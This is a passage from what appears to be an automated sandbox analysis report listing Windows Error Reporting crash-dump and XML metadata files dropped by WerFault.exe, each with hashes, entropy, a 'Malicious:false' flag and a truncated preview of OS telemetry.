                                                                                                                                  SHA-512:4C57B22876C123E0B917F4786406572EAA13E7F675D0832CB77D5ED999015DCEDDD635353F6F9F1D250F02C19E586DAFE4CF2BE2C28A5400B7649B0F6B158A6B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER146D.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.464279381491416
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYKmYm8M4JqsHFKb+q8vzsU1KNfNwd:uIjffI7hd7VPPJibKxKNfNwd
                                                                                                                                  MD5:027213FA383E58AD6610D64E6F6C0C26
                                                                                                                                  SHA1:3918592221EDF0F4248328B9AF01601548C509BF
                                                                                                                                  SHA-256:9DB126AAE0CCACCCB4A1F054A22903713FCEF4C4F83B022AD9F1E36E2B80004C
                                                                                                                                  SHA-512:1062F219F1D7D6A7AC98829F2F735581994836DD2D8C5C71ADD54F91C975C5DC6ABDA5FCD768B2038ED30835C8AD47E383C277C82C4C57399642EF21C1D6C5D3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER166F.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:28:50 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):94656
                                                                                                                                  Entropy (8bit):1.7813018611103215
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:e3rDeYogEkzdzTa/ehME3AXDYBnqKI2jdZ7ucd2dt2+u0U:e3XezgEeSGhMxXsJqKI2jbOtrRU
                                                                                                                                  MD5:429D5AFDA31FE1FA13F7334E18AF08B7
                                                                                                                                  SHA1:E2B1E3D8F361C93BC53CFA9E17F6C8FBB719B161
                                                                                                                                  SHA-256:8DA4B82D360E4B928E7ED98761216F80208D0936987F5B67AE281713FE5A19FF
                                                                                                                                  SHA-512:8EFD1E01A28D827D45623BE49F4F42110FBA9B2DD7D626CD2CE43D1AD8A2C77EB5923B8077F253B3E0A36AD60220E5756AEEC4AAB8826D089BBB65D735ADC967
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......2..g............T...........P...\...........87..........T.......8...........T............!...O......................................................................................................eJ......0.......GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER16FC.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8404
                                                                                                                                  Entropy (8bit):3.6964024088832783
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1A61w46YVg6pPsGgmfLYspBa89bO6sfcam:R6lXJS6f6Yi6LgmfL1OZfw
                                                                                                                                  MD5:B61BDC0710DDCA9EFCB75D7D8658FDB7
                                                                                                                                  SHA1:6841D704B0078FD93017FA46DD565CE6A3854C90
                                                                                                                                  SHA-256:AA4D21DF5A51CC19DCC25D79E3B8398518CF0E00B915212B0B15B928F5424A4E
                                                                                                                                  SHA-512:A5022F40DF492A2F956876A8535592F6D36CE47EE6A02AD7B47B7A65BA0341C68C87133C3550F42073A103235A41507735FAFE475ADD5D561AC48BBAB38D117E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER172C.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.465032640087718
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VY3Ym8M4JqsHF9+q8vzsU1KNfNwd:uIjffI7hd7V/JlKxKNfNwd
                                                                                                                                  MD5:D618255AEE0EAE7897EDAD0DF24C7840
                                                                                                                                  SHA1:4DCA978ECD87A96314212B9C8437BE8F40A843F7
                                                                                                                                  SHA-256:2E59625F20155DBB8F78DFE2B2089EA2573E679785B98DEBE27CCF69E3EA7D38
                                                                                                                                  SHA-512:DAF148EC923F9CDA35E8AF8120E00D1AD22144A4B0137CE95FCC73CE2CB31DB2E28F8A73FBE37248FD5466F186ECB561B1B96549864584D4807A88710BBF4C7B
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER18EF.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:28:51 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):102046
                                                                                                                                  Entropy (8bit):1.7701574261913697
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:0a0lgECzlo1MD7TieYbqKxUjdZ7ucDmW1++q+M1:L0lgEC+MDXFYbqKxUjbv+fp
                                                                                                                                  MD5:EA0376594DF189B76AD0F0FA618E9110
                                                                                                                                  SHA1:0C4F4EA0DA3C5B9EA02D2ABC3C422BB3DB06ECC9
                                                                                                                                  SHA-256:6B8E06BDE97F29166D2CF15A448DE9BF29936B9E7B13E1CCD9F041399A161D01
                                                                                                                                  SHA-512:CF81072A0EFA458A99D1E14FE1975C8389750A13B74A568F7508CB37DBA8011FAECBB495F557F4DA829CB37C1441A26DC0E991F9299F8C326F41100DCCC45779
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......3..g.........................................;..........T.......8...........T............*...d.......... ...........................................................................................eJ..............GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A09.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8404
                                                                                                                                  Entropy (8bit):3.69911078325108
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ166WL6YVH6pPsGgmfLYspB989bX6sfDCdm:R6lXJo6K6YF6LgmfLMXZfDh
                                                                                                                                  MD5:8D73C58338FE8257052D39AB34937E77
                                                                                                                                  SHA1:EB557ADE100A568B31F67802E9B95805BC43042A
                                                                                                                                  SHA-256:E5B357341BC6ACF4B124A12114069231BD224DD6C4E79BC08A68DDFA29124734
                                                                                                                                  SHA-512:DB3B469BA3B7BAABBE857D3BBF672612C04FC038DD95FFB9869F8AA1FAE02216CA45B8108F6FF83E5D65833802D5C96FFEBF1F3A7D8BE3ABCDDD9C49736502F3
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A2A.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.464909614903095
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYkYm8M4JqsHFhFj+q8vzsU1KNfNwd:uIjffI7hd7VwJJFjKxKNfNwd
                                                                                                                                  MD5:8FEA46F9469D5B0730D4D50D041EBD38
                                                                                                                                  SHA1:AB00148D64B1A43C442F2DD1945A222BB5511271
                                                                                                                                  SHA-256:7F6A6B850B17B05C1F98221C831647989D94E754AD12F818FF9F4EEA55CE2AF1
                                                                                                                                  SHA-512:A6FAE04AB8E2AE994770B1237FEA62699BEB189519B539B44BADACF95D15D8101D46FB650116022E2CDCEC8D312EE8E2DDE42F777B469AA0FC2F319793E40279
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D35.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:28:52 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):110696
                                                                                                                                  Entropy (8bit):1.7868272891185941
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:aULLK78gEot7QFrhuBazbrrLieAnqKxUjdZ7ucuXmMd41DxFaT5s:xS78gE87OuBajfFAnqKxUjbg4JxwTW
                                                                                                                                  MD5:65DF4B350889717403AC9A2657BA1EE6
                                                                                                                                  SHA1:E7564CEE633EA53A60DFAE44A0ECF40F9481065E
                                                                                                                                  SHA-256:6899304B186DB78559C6452547E0643FFD3EFF8268E43FF0CFC37F68CCE0A63A
                                                                                                                                  SHA-512:1BCAC07EEA3F0D1A6CFD9C64D60E75F3BAB5A342BAF1D229249CAA57BCF91020FA6F47A4A4DE2A76BFC7BD5FD01E776D8332C2F19176337F8687410806E2D00E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......4..g....................................T....>..........T.......8...........T...........h*..............P...........<...............................................................................eJ..............GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E30.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8406
                                                                                                                                  Entropy (8bit):3.6989881171629055
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ15v6i6YVm6pPsGgmfLYspBP89bc6sf5b0m:R6lXJzv6i6YE6LgmfLmcZf5N
                                                                                                                                  MD5:8903B1BE383DC13C8C4B1643E46550A8
                                                                                                                                  SHA1:F60DA2436BC7FDB4C0B1E0C5BF97523C0F4A94E7
                                                                                                                                  SHA-256:B1E9EC1C176E80EE7DA273B58EEF7C3FE0D68572E0095371A47D5D7821DC9802
                                                                                                                                  SHA-512:00CFBF8521BA746D1F3D3A55DE661CCDB601412886497C093E453A59E4180F310E017AF8E9737AA0EA1B952BB3780249363C85DEBED4D9CF4148E6DA3749F15E
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E50.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.4640877982067035
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VYgYm8M4JqsHFl7U+q8vzsU1KNfNwd:uIjffI7hd7VgJlUKxKNfNwd
                                                                                                                                  MD5:BF3E9BA44AD90B0DDFF062C7D952D3AD
                                                                                                                                  SHA1:FDE9AF2320DA265F80351569F0835E8D684A9156
                                                                                                                                  SHA-256:B264D9CF943F9377D77D69DDCED4D73A84A66579017150D6491099AE2EA71338
                                                                                                                                  SHA-512:68385B9CADEB356B48DA4BB7F299DC2098B302654DE930542392AB6076398426411614F3270AFAE21DEA1FD280FCD9EE65D518356D67425D82FC01DA57294144
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="537031" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2081.tmp.dmp

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 14 streams, Thu Oct 10 07:28:53 2024, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):120408
                                                                                                                                  Entropy (8bit):1.8470619464846987
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:YYYv+gELwr9pzQkylkLTiuL76EqqKxUjdZ7ucSC9UqsbL4lC4EgfJ:dYv+gE03sBSnVL76nqKxUjb7UtHeHEmJ
                                                                                                                                  MD5:6D5EBBA7255AC1D11149E6CC31D8805F
                                                                                                                                  SHA1:7F615E122A7A445EEF86DF868814334165159745
                                                                                                                                  SHA-256:22BD8D89CCAACDEF1A109066A7DA24D0C3F3D8A99E1185D4700CAEC1FB6062FA
                                                                                                                                  SHA-512:0573BE7A77698123A2D2BA01771852D84122EC6AE3E7346E4EE7FB751F363E0282ED2D8AFA95F01C831F081190BE292592EF3316378B24DE43AA931CB1205E8D
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:MDMP..a..... .......5..g........................D................C..........T.......8...........T............0..............0...........................................................................................eJ..............GenuineIntel............T...........)..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER213D.tmp.WERInternalMetadata.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8406
                                                                                                                                  Entropy (8bit):3.698139391154823
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:R6l7wVeJ1s6v6YVc6pPsGgmfLYspB089bl6sf23m:R6lXJO6v6Y+6LgmfLnlZfX
                                                                                                                                  MD5:3D8214F9207F79AAE341DC6E7D090B37
                                                                                                                                  SHA1:5FA7AE57F62DE368049D2F2A9A454522EB36EF88
                                                                                                                                  SHA-256:ADBD547CB87C9B18C7D06848B99CB3912A3E9F0BEB5693DC0622974331B8CB35
                                                                                                                                  SHA-512:FB7FE30FDCD892D9DE3985A7E1B25F7BC413CF04F2636B2901814DDA093592EAFBDA7FEE39402F1E29BEDA7206E21AC76BA43122808778695D79F5561902C6AA
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.2.0.<./.P.i.

                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER215D.tmp.xml

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4710
                                                                                                                                  Entropy (8bit):4.462444609741579
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwWl8zsFJg77aI9nEWpW8VY15Ym8M4JqsHFgx+q8vzsU1KNfNwd:uIjffI7hd7VLJgKxKNfNwd
                                                                                                                                  MD5:01149CD5EC7097E7864EC2A47EEFCB49
                                                                                                                                  SHA1:A54F702BDDFA3D955A5A6F5F4A468C36E051475A
                                                                                                                                  SHA-256:6C1766304F72A2EBAEDD5348FF7D236199F428833B4B1D805CC2242F2A6BE9A5
                                                                                                                                  SHA-512:4F00359ECE908EF5E2B36F330DB75085147A50299A96E609A49919CBA4C258504E0AEA4853FD53154770FC19D28E45FBB867F00EAE1CE4DBFDB35DECACC5EE55
                                                                                                                                  Malicious:false
